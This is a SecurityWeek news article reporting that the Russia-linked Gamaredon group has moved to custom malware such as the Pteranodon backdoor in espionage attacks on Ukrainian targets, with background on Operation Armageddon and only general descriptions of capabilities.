Security Experts:

"Gamaredon" Group Uses Custom Malware in Ukraine Attacks

A Russia-linked threat group tracked as “Gamaredon” has been using custom-developed malware in attacks aimed at Ukraine, Palo Alto Networks reported on Monday.

The group has been active since at least mid-2013, but its activities were first detailed in April 2015 by LookingGlass. The security firm’s analysis focused on Operation Armageddon, a cyber espionage campaign targeting Ukrainian government, military and law enforcement officials.

The Security Service of Ukraine (SBU) issued a statement at the time attributing the attacks to branches of Russia's Federal Security Service (FSB). Furthermore, evidence found by researchers suggested that the malware used by the threat actor had been built on a Russian operating system.

In the attacks analyzed by LookingGlass in 2015, the Gamaredon group used spear-phishing emails to deliver common remote access tools (RATs), such as Remote Manipulator System (RMS) and UltraVNC.

According to Palo Alto Networks, Gamaredon has started using new, custom-built malware instead of the widely available RATs. However, it’s unclear if the latest attacks are also part of Operation Armageddon or if they represent a new campaign.

The new pieces of malware used by the group are capable of downloading and executing additional payloads, scanning infected systems for specific files, capturing screenshots, and executing remote commands. While the actor’s older tools were easily identified by antimalware products (e.g. TROJ_GAMAREDON, Trojan.Gamaredon), its new creations often go undetected or unrecognized.

“We believe this is likely due to the modular nature of the malware, the malware’s heavy use of batch scripts, and the abuse of legitimate applications and tools (such as wget) for malicious purposes,” said Palo Alto Networks researchers.

One of the custom backdoors used by Gamaredon is Pteranodon, which can capture screenshots, download and execute files, and execute commands on the system.

While Gamaredon has started using new malware, it still relies on self-extracting archives (SFX) and much of the same infrastructure as when its activities were first analyzed.

Russia-linked threat groups have been blamed for several campaigns targeting Ukrainian organizations, including damaging attacks on the country’s energy sector.

Related: Experts Doubt Russia Used Malware to Track Ukrainian Troops

Related: Ukrainian Group Claims Hack of Putin Advisor's Email

Related: Ukraine Power Grid Attacks Part of a 2-Year Campaign

view counter
Eduard Kovacs (@EduardKovacs) is a contributing editor at SecurityWeek. He worked as a high school IT teacher for two years before starting a career in journalism as Softpedia’s security news reporter. Eduard holds a bachelor’s degree in industrial informatics and a master’s degree in computer techniques applied in electrical engineering.